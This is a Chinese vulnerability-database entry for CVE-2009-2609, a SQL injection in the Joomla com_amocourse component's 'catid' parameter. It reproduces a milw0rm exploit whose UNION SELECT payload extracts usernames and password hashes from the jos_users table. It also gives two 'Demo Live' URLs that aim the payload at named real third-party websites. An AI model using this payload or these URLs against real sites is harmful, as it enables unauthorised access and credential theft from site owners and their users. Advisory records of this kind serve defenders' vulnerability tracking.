Amotools com_amocourse组件'catid'参数SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118009 漏洞类型 SQL注入
发布时间 2009-06-24 更新时间 2009-07-27
CVE编号 CVE-2009-2609 CNNVD-ID CNNVD-200907-381
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/9016
https://cxsecurity.com/issue/WLB-2009070204
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-381
|漏洞详情
Joomla!amoCourse(com_amocourse)componen存在SQL注入漏洞,允许远程攻击者借助对index.php的category操作中的catid参数执行任意的SQL指令。
|漏洞EXP
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_amocourse (catid) SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


###################################################
[+] Author        :  Chip D3 Bi0s
[+] Email         :  chipdebios[alt+64]gmail.com
[+] Greetz        :  d4n1ux + x_jeshua + eCORE + rayok3nt
[+] Vulnerability :  SQL injection 

###################################################



Example:
http://localHost/path//index.php?option=com_amocourse&task=view&view=category&catid=n[SQL code]

n = catid valid

[SQL code]
+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users--


Demo Live (1)
http://www.kaieden.com/joomla/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users--


Demo Live Mambo (2)
http://www.tangotherapy.co.uk/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users--






+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-06-24]
|参考资料

来源:XF
名称:amocourse-index-sql-injection(51358)
链接:http://xforce.iss.net/xforce/xfdb/51358
来源:BID
名称:35489
链接:http://www.securityfocus.com/bid/35489
来源:MILW0RM
名称:9016
链接:http://www.milw0rm.com/exploits/9016